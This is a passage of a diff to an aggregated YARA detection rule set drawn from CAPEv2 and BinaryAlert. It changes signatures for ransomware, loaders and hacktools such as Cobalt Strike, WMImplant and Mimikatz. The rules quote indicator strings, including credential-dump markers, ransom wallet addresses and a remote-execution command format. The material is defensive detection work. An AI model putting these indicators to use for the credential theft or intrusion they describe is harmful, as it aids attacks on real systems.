"e6d395d5-65ba-5efb-bcbc-c6d56a96f0c1" + date = "2024-03-18" + modified = "2024-03-18" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/TSCookie.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "0461c7fd14c74646437654f0a63a4a89d4efad620e197a8ca1e8d390618842c3" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Carbanak.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "c9c1b06cb9c9bd6fc4451f5e2847a1f9524bb2870d7bb6f0ee09b9dd4e3e4c84" + logic_hash = "8ed5ab07f1635dc7cdf296e86a71a0a99d0b2faef8fc460f43d426b24b8c8367" score = 75 quality = 70 tags = "FILE" - cape_type = "TSCookie Payload" + cape_type = "Carbanak Payload" strings: - $string1 = "http://%s:%d" wide - $string2 = "/Default.aspx" wide - $string3 = "\\wship6" + $sboxinit = {0F BE 02 4? 8D 05 [-] 4? 8D 4D ?? E8 [3] 00 33 F6 4? 8D 5D ?? 4? 63 F8 8B 45 ?? B? B1 E3 14 06} + $decode_string = {0F BE 03 FF C9 83 F8 20 7D ?? B? 1F [3] 4? 8D 4A E2 EB ?? 3D 80 [3] 7D ?? B? 7F [3] 4? 8D 4A A1 EB ?? B? FF [3] 4? 8D 4A 81} + $constants = {0F B7 05 [3] 00 0F B7 1D [3] 00 83 25 [3] 00 00 89 05 [3] 00 0F B7 05 [3] 00 89 1D [3] 00 89 05 [3] 00 33 C0 4? 8D 4D} condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and 2 of them } -rule CAPE_Wanacry : FILE +rule CAPE_Locky : FILE { meta: - description = "WanaCry Payload" + description = "Locky Payload" author = "kevoreilly" - id = "a6525e0f-fccd-5542-9be8-e42d708fe502" + id = "664d0365-af49-5222-a4ed-9260332f6940" date = "2022-06-09" modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/WanaCry.yar#L1-L16" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "16d5e39f043d27bbf22f8f21e13971b7e0709b07e44746dd157d11ee4cc51944" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Locky.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "9786c54a2644d9581fefe64be11b26e22806398e54e961fa4f19d26eae039cd7" score = 75 quality = 70 tags = "FILE" - cape_type = "WanaCry Payload" + cape_type = "Locky Payload" strings: - $exename = "@WanaDecryptor@.exe" - $res = "%08X.res" - $pky = "%08X.pky" - $eky = "%08X.eky" - $taskstart = {8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53} + $string1 = "wallet.dat" wide + $string2 = "Locky_recover" wide + $string3 = "opt321" wide condition: uint16(0)==0x5A4D and all of them } -rule CAPE_Zloader : FILE -{ - meta: - description = "Zloader Payload" - author = "kevoreilly, enzok" - id = "ce0662b4-c615-5b87-b5c1-173f90a97db2" - date = "2024-05-06" - modified = "2024-05-06" - reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Zloader.yar#L1-L18" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa" - logic_hash = "a94efd87c69146cf5771341974e5abe789445d67dde3e045e1b87d3131539ff9" - score = 75 - quality = 70 - tags = "FILE" - cape_type = "Zloader Payload" - - strings: - $rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)} - $decrypt_conf = {83 C4 04 84 C0 74 5? E8 [4] E8 [4] E8 [4] E8 [4] ?8 [4] ?8 [4] ?8} - $decrypt_conf_1 = {48 8d [5] [0-6] e8 [4] 48 [3-4] 48 [3-4] 48 [6] E8} - $decrypt_conf_2 = {48 8d [5] 4? [5] e8 [4] 48 [3-4] 48 8d [5] E8 [4] 48} - $decrypt_key_1 = {66 89 C2 4? 8D 0D [3] 00 4? B? FC 03 00 00 E8 [4] 4? 83 C4 [1-2] C3} - $decrypt_key_2 = {48 8d 0d [3] 00 66 89 ?? 4? 89 F0 4? [2-5] E8 [4-5] 4? 83 C4} - $decrypt_key_3 = {48 8d 0d [3] 00 e8 [4] 66 89 [3] b? [4] e8 [4] 66 8b} - - condition: - uint16(0)==0x5A4D and 1 of ($decrypt_conf*) and (1 of ($decrypt_key*) or $rc4_init) -} -rule CAPE_Lumma : FILE +rule CAPE_Codoso : FILE { meta: - description = "Lumma Payload" + description = "Codoso Payload" author = "kevoreilly" - id = "334807ca-8548-5219-8614-7c922368e276" - date = "2024-03-13" - modified = "2024-03-13" + id = "4c3d8d77-ffa9-576d-bf88-7b5a1bfd1811" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Lumma.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "5b172496e2488cc3e9cdbd5a08229c3691bafba2fcdbdfd2805c7ac58f9c5751" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Codoso.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "32c9ed2ac29e8905266977a9ee573a252442d96fb9ec97d88642180deceec3f8" score = 75 quality = 70 tags = "FILE" - cape_type = "Lumma Payload" - packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8" + cape_type = "Codoso Payload" strings: - $c2 = {8D 44 24 ?? 50 89 4C 24 ?? FF 31 E8 [4] 83 C4 08 B8 FF FF FF FF} - $peb = {8B 44 24 04 85 C0 74 13 64 8B 0D 30 00 00 00 50 6A 00 FF 71 18 FF 15} - $remap = {C6 44 24 20 00 C7 44 24 1C C2 00 00 90 C7 44 24 18 00 00 FF D2 C7 44 24 14 00 BA 00 00 C7 44 24 10 B8 00 00 00 8B ?? 89 44 24 11} + $a1 = "WHO_A_R_E_YOU?" + $a2 = "DUDE_AM_I_SHARP-3.14159265358979" + $a3 = "USERMODECMD" condition: - uint16(0)==0x5a4d and any of them + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Blister : FILE +rule CAPE_Dreambot : FILE { meta: - description = "Blister Loader" + description = "Dreambot Payload" author = "kevoreilly" - id = "525fc600-2afc-5cf6-bf55-4ce0ea264dca" - date = "2023-09-20" - modified = "2023-09-20" + id = "675c2fea-fe48-5afd-9fa1-de919134892f" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Blister.yar#L1-L17" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2" - hash = "d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802c" - logic_hash = "f26d85fdf0eb07e67fe38c43c5f6d024bfb7b2a333cb3411f5cdcff6bf5db12d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Dreambot.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "29c6d648d5d38667c5824c2d20a83a20448c2ae6054ddddb2b2b7f8bdb69f74b" score = 75 quality = 70 tags = "FILE" - cape_type = "Blister Loader" + cape_type = "Dreambot Payload" strings: - $protect1 = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7} - $protect2 = {48 83 C9 FF 48 8D 55 ?? FF D6 48 8D 87 [2] 00 00 48 8D 4D ?? FF D0} - $lock1 = {B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75} - $lock2 = {B8 FF FF FF 7F 41 BC 01 00 00 00 89 45 40 F0 FF 4D 40 49 2B C4 75} - $decode = {0F BE C0 49 03 CC 41 33 C1 44 69 C8 [4] 41 8B C1 C1 E8 0F 44 33 C8 8A 01 84 C0 75 E1 41 81 F9 [4] 74} + $a1 = {53 56 33 F6 33 DB C1 6C 24 0C 02 74 2F 8B 02 85 C0 75 11 83 7C 24 0C 02 76 0A 39 42 04 75 05 39 42 08 74 18 43 8A CB D3 C0 33 C6 33 44 24 10 8B F0 89 32 83 C2 04 FF 4C 24 0C 75 D1 5E 5B C2 08 00} + $a2 = {53 33 C9 33 DB C1 6C 24 08 02 74 22 56 8B 02 85 C0 8B F0 74 18 33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 E0 5E 5B C2 08 00} + $b1 = "Oct 5 2016" + $b2 = ".bss" condition: - uint16(0)==0x5A4D and 2 of them + uint16(0)==0x5A4D and (1 of ($a*)) and ( all of ($b*)) } /* * YARA Rule Set * Repository Name: BinaryAlert * Repository: https://github.com/airbnb/binaryalert/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: a9c0f06affc35e1f8e45bb77f835b92350c68a0b - * Number of Rules: 78 + * Number of Rules: 80 * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance) * * @@ -115198,6 +117011,39 @@ private rule BINARYALERT_Macho_PRIVATE : FILE condition: uint32(0)==0xfeedface or uint32(0)==0xcefaedfe or uint32(0)==0xfeedfacf or uint32(0)==0xcffaedfe or uint32(0)==0xcafebabe or uint32(0)==0xbebafeca } +private rule BINARYALERT_Cobaltstrike_Template_Exe_PRIVATE : FILE +{ + meta: + description = "Template to provide executable detection Cobalt Strike payloads" + author = "@javutin, @joseselvi" + id = "39c27acf-1264-584d-99e0-77b0e9352078" + date = "2017-12-14" + modified = "2017-12-14" + reference = "https://www.cobaltstrike.com" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_template.yara#L1-L28" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "492b2b0b319509fe26473add6ca50c246a0c30fb8a7f9e2631c8d3e9e146c611" + score = 75 + quality = 80 + tags = "FILE" + + strings: + $compiler = "mingw-w64 runtime failure" nocase + $f1 = "VirtualQuery" fullword + $f2 = "VirtualProtect" fullword + $f3 = "vfprintf" fullword + $f4 = "Sleep" fullword + $f5 = "GetTickCount" fullword + $c1 = { // Compare case insensitive with "msvcrt", char by char + 0f b6 50 01 80 fa 53 74 05 80 fa 73 75 42 0f b6 + 50 02 80 fa 56 74 05 80 fa 76 75 34 0f b6 50 03 + 80 fa 43 74 05 80 fa 63 75 26 0f b6 50 04 80 fa + 52 74 05 80 fa 72 75 18 0f b6 50 05 80 fa 54 74 + } + + condition: + uint16(0)==0x5a4d and filesize <1000KB and $compiler and all of ($f*) and all of ($c*) +} rule BINARYALERT_Eicar_Av_Test { meta: @@ -115242,312 +117088,457 @@ rule BINARYALERT_Eicar_Substring_Test condition: all of them } -rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Postexploitation : FILE +rule BINARYALERT_Ransomware_Windows_Zcrypt { meta: - description = "Detection of strings in the post-exploitation modules of Cobalt Strike" - author = "@javutin, @mimeframe" - id = "76c2a5ae-bc7c-50c7-8731-94c75912574f" - date = "2017-12-14" - modified = "2017-12-14" - reference = "https://www.cobaltstrike.com/support" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_postexploitation.yara#L1-L13" + description = "Zcrypt will encrypt data and append the .zcrypt extension to the filenames" + author = "@fusionrace" + id = "d79cd266-4e77-562c-975c-8bf72efe7242" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://blog.malwarebytes.com/threat-analysis/2016/06/zcrypt-ransomware/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara#L1-L23" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "1a89128a0f5774d1333be440d38128e29cb36f9818fa44e60482ef078078aca8" + hash = "d1e75b274211a78d9c5d38c8ff2e1778" + logic_hash = "df4073363da162e69f29493b5bfb4cb3f3d342357335c13ba6a3ac868607cb25" score = 75 - quality = 80 - tags = "FILE" + quality = 78 + tags = "" strings: - $s1 = "\\devcenter\\aggressor\\external\\" + $u1 = "How to Buy Bitcoins" ascii wide + $u2 = "ALL YOUR PERSONAL FILES ARE ENCRYPTED" ascii wide + $u3 = "Click Here to Show Bitcoin Address" ascii wide + $u4 = "MyEncrypter2.pdb" fullword ascii wide + $g1 = ".p7b" fullword ascii wide + $g2 = ".p7c" fullword ascii wide + $g3 = ".pdd" fullword ascii wide + $g4 = ".pef" fullword ascii wide + $g5 = ".pem" fullword ascii wide + $g6 = "How to decrypt files.html" fullword ascii wide condition: - filesize >10KB and filesize <1000KB and all of ($s*) + any of ($u*) or all of ($g*) } -rule BINARYALERT_Hacktool_Windows_Ncc_Wmicmd +rule BINARYALERT_Ransomware_Windows_Petya_Variant_Bitcoin { meta: - description = "Command shell wrapper for WMI" - author = "@mimeframe" - id = "18bc36f7-b97a-5bce-a68b-c349713e9468" + description = "Petya Ransomware new variant June 2017 using ETERNALBLUE: Bitcoin" + author = "@fusionrace" + id = "82d6ecc5-7c90-5d50-90ff-f54f8d87685d" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/nccgroup/WMIcmd" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_ncc_wmicmd.yara#L1-L18" + reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara#L1-L13" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "bef6828a706dcfc3b573523fccd391a5ef3fa505235b1621a82527d64d32aaf0" + hash = "71b6a493388e7d0b40c83ce903bc6b04" + logic_hash = "9a5e183aa8e1387e76d5df4e967943b730ba780b6758af3ef23e21bb9e4ce3a6" score = 75 quality = 80 tags = "" strings: - $a1 = "Need to specify a username, domain and password for non local connections" wide ascii - $a2 = "WS-Management is running on the remote host" wide ascii - $a3 = "firewall (if enabled) allows connections" wide ascii - $a4 = "WARNING: Didn't see stdout output finished marker - output may be truncated" wide ascii - $a5 = "Command sleep in milliseconds - increase if getting truncated output" wide ascii - $b1 = "0x800706BA" wide ascii - $b2 = "NTLMDOMAIN:" wide ascii - $b3 = "cimv2" wide ascii + $s1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" fullword wide condition: - any of ($a*) or all of ($b*) + $s1 } -rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Powershell : FILE +rule BINARYALERT_Ransomware_Windows_Powerware_Locky { meta: - description = "Detection of the PowerShell payloads from Cobalt Strike" - author = "@javutin, @joseselvi" - id = "155f181a-56cb-5295-a903-744f79012733" - date = "2017-12-14" - modified = "2017-12-14" - reference = "https://www.cobaltstrike.com/help-payload-generator" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_powershell.yara#L1-L21" + description = "PowerWare Ransomware" + author = "@fusionrace" + id = "8a1a56af-7a9d-54ed-90b9-daf33735ee1e" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara#L1-L17" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "39dd0aaa84d02aae5766d764c3d371f03f9df33acf5f6ae4ab4a8c73dd827213" + hash = "3433a4da9d8794709630eb06afd2b8c1" + logic_hash = "64de34755f706a9fd4c876c473eed4f8922a4450c7ef135b0ab5e49c67363baf" score = 75 - quality = 80 - tags = "FILE" + quality = 78 + tags = "" strings: - $ps1 = "Set-StrictMode -Version 2" - $ps2 = "func_get_proc_address" - $ps3 = "func_get_delegate_type" - $ps4 = "FromBase64String" - $ps5 = "VirtualAlloc" - $ps6 = "var_code" - $ps7 = "var_buffer" - $ps8 = "var_hthread" + $s0 = "ScriptRunner.dll" fullword ascii wide + $s1 = "ScriptRunner.pdb" fullword ascii wide + $s2 = "fixed.ps1" fullword ascii wide condition: - $ps1 at 0 and filesize <1000KB and all of ($ps*) + all of them } -rule BINARYALERT_Hacktool_Windows_Wmi_Implant +rule BINARYALERT_Ransomware_Windows_Hddcryptora { meta: - description = "A PowerShell based tool that is designed to act like a RAT" + description = "The HDDCryptor ransomware encrypts local harddisks as well as resources in network shares via Server Message Block (SMB)" author = "@fusionrace" - id = "cd90ef31-6e15-5518-8278-98e99e379916" + id = "56d7f1f5-811d-58c9-9e1d-d2f48c01e167" date = "2017-08-11" modified = "2017-08-11" - reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_wmi_implant.yara#L1-L21" + reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_HDDCryptorA.yara#L1-L23" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "8b02fd265b04b9675a99b9638fdd179c8a86ed3afd7506195f3d3dcb2417d74d" + hash = "498bdcfb93d13fecaf92e96f77063abf" + logic_hash = "24c113be31c3df7b544a5789bf055f77471d450c07f0a6729a715e2a82b4d1f0" score = 75 - quality = 80 + quality = 78 tags = "" strings: - $s1 = "This really isn't applicable unless you are using WMImplant interactively." fullword ascii wide - $s2 = "What command do you want to run on the remote system? >" fullword ascii wide - $s3 = "Do you want to [create] or [delete] a string registry value? >" fullword ascii wide - $s4 = "Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >" fullword ascii wide - $s5 = "What is the name of the service you are targeting? >" fullword ascii wide - $s6 = "This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine" fullword ascii wide - $s7 = "gen_cli - Generate the CLI command to execute a command via WMImplant" fullword ascii wide - $s8 = "exit - Exit WMImplant" fullword ascii wide - $s9 = "Lateral Movement Facilitation" fullword ascii wide - $s10 = "vacant_system - Determine if a user is away from the system." fullword ascii wide - $s11 = "Please provide the ProcessID or ProcessName flag to specify the process to kill!" fullword ascii wide + $u1 = "You are Hacked" fullword ascii wide + $u2 = "Your H.D.D Encrypted , Contact Us For Decryption Key" nocase ascii wide + $u3 = "start hard drive encryption..." ascii wide + $u4 = "Your hard drive is securely encrypted" ascii wide + $g1 = "Wipe All Passwords?" ascii wide + $g2 = "SYSTEM\\CurrentControlSet\\Services\\dcrypt\\config" ascii wide + $g3 = "DiskCryptor" ascii wide + $g4 = "dcinst.exe" fullword ascii wide + $g5 = "dcrypt.exe" fullword ascii wide + $g6 = "you can only use AES to encrypt the boot partition!" ascii wide condition: - any of them + 2 of ($u*) or 4 of ($g*) } -rule BINARYALERT_Hacktool_Windows_Hot_Potato +rule BINARYALERT_Ransomware_Windows_Wannacry { meta: - description = "No description has been set in the source file - BinaryAlert" - author = "@mimeframe" - id = "dee13640-b4a9-5a39-af01-338c0197c995" + description = "wannacry ransomware for windows" + author = "@fusionrace" + id = "0269b6f4-a47d-5683-aaaa-2141ca7f04dc" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/foxglovesec/Potato" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_hot_potato.yara#L1-L15" + reference = "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_wannacry.yara#L1-L23" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "1ccee61660b3478294a5a4e1ca2b16c91156f6c877d0f83848cccd18a3f753f7" + hash = "4fef5e34143e646dbf9907c4374276f5" + logic_hash = "c01f460c0f5e39cde5f553c966553fe693e5203cb020b8f571eac6fc193fa91b" score = 75 - quality = 80 + quality = 50 tags = "" strings: - $a1 = "Parsing initial NTLM auth..." wide ascii - $a2 = "Got PROPFIND for /test..." wide ascii - $a3 = "Starting NBNS spoofer..." wide ascii - $a4 = "Exhausting UDP source ports so DNS lookups will fail..." wide ascii - $a5 = "Usage: potato.exe -ip" wide ascii + $a1 = "msg/m_chinese" wide ascii + $a2 = ".wnry" wide ascii + $a3 = "attrib +h" wide ascii + $b1 = "WNcry@2ol7" wide ascii + $b2 = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" wide ascii + $b3 = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" wide ascii + $b4 = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" wide ascii + $b5 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" wide ascii condition: - any of ($a*) + all of ($a*) or any of ($b*) } -rule BINARYALERT_Hacktool_Windows_Moyix_Creddump +rule BINARYALERT_Ransomware_Windows_Petya_Variant_2 { meta: - description = "creddump is a python tool to extract credentials and secrets from Windows registry hives." - author = "@mimeframe" - id = "46df781a-abab-5593-99f9-1a6b993904cb" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://github.com/moyix/creddump" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_moyix_creddump.yara#L1-L16" + description = "Petya Ransomware new variant June 2017 using ETERNALBLUE" + author = "@fusionrace" + id = "6401fd7e-5ef7-58b5-b8d3-a63c70e8daa3" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_2.yara#L1-L17" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "3f2f4c5069fcb3d3b1d293a471bcf9489f058f27cd385885ab2bb4f719a3bd9d" + hash = "71b6a493388e7d0b40c83ce903bc6b04" + logic_hash = "7e04ffd0423cd1288af5c045bb06930abb732c0ea059e329cafc05faecb4f982" + score = 75 + quality = 78 + tags = "" + + strings: + $s1 = "dllhost.dat" fullword wide + $s2 = "\\\\%ws\\admin$\\%ws" fullword wide + $s3 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\"" fullword wide + $s4 = "\\\\.\\PhysicalDrive" fullword wide + $s5 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip." fullword wide + + condition: + 3 of them +} +rule BINARYALERT_Ransomware_Windows_Cerber_Evasion +{ + meta: + description = "Cerber Ransomware: Evades detection by machine learning applications" + author = "@fusionrace" + id = "6e2f44a9-bc0f-5071-9d80-ddfb778cfe5d" + date = "2017-08-11" + modified = "2017-08-11" + reference = "http://www.darkreading.com/vulnerabilities---threats/cerber-ransomware-now-evades-machine-learning/d/d-id/1328506" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara#L1-L15" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + hash = "bc62b557d48f3501c383f25d014f22df" + logic_hash = "43b3b8be5a23b57f6c671abd8491cdc51af1cf3a3fe8a7be308150697cdb92ea" score = 75 quality = 80 tags = "" strings: - $a1 = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%" wide ascii - $a2 = "0123456789012345678901234567890123456789" wide ascii - $a3 = "NTPASSWORD" wide ascii - $a4 = "LMPASSWORD" wide ascii - $a5 = "aad3b435b51404eeaad3b435b51404ee" wide ascii - $a6 = "31d6cfe0d16ae931b73c59d7e0c089c0" wide ascii + $s1 = "38oDr5.vbs" fullword ascii wide + $s2 = "8ivq.dll" fullword ascii wide + $s3 = "jmsctls_progress32" fullword ascii wide condition: - all of ($a*) + all of them } -rule BINARYALERT_Hacktool_Windows_Mimikatz_Errors +rule BINARYALERT_Ransomware_Windows_Hydracrypt { meta: - description = "Mimikatz credential dump tool: Error messages" + description = "HydraCrypt encrypts a victim’s files and appends the filenames with the extension “hydracrypt_ID_*" author = "@fusionrace" - id = "94d50739-fc84-5bfe-821d-5e2851f681e3" + id = "9ebf205e-b6a9-55a3-b0c3-9b088790dc9a" date = "2017-08-11" modified = "2017-08-11" - reference = "https://github.com/gentilkiwi/mimikatz" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_errors.yara#L1-L16" + reference = "https://securingtomorrow.mcafee.com/mcafee-labs/hydracrypt-variant-of-ransomware-distributed-by-angler-exploit-kit/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara#L1-L16" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "60fb94b9465b19af3b2df1b26490d4ac19a31a39f2f8c52f1059d37843769b36" + hash = "08b304d01220f9de63244b4666621bba" + logic_hash = "3ecb3e6c269f4145e60b0e7bb0e896120ceb2db2123f847bf4bdf5d4490467d5" score = 75 quality = 80 tags = "" - md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669" - md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c" strings: - $s1 = "[ERROR] [LSA] Symbols" fullword ascii wide - $s2 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii wide - $s3 = "[ERROR] [CRYPTO] Symbols" fullword ascii wide - $s4 = "[ERROR] 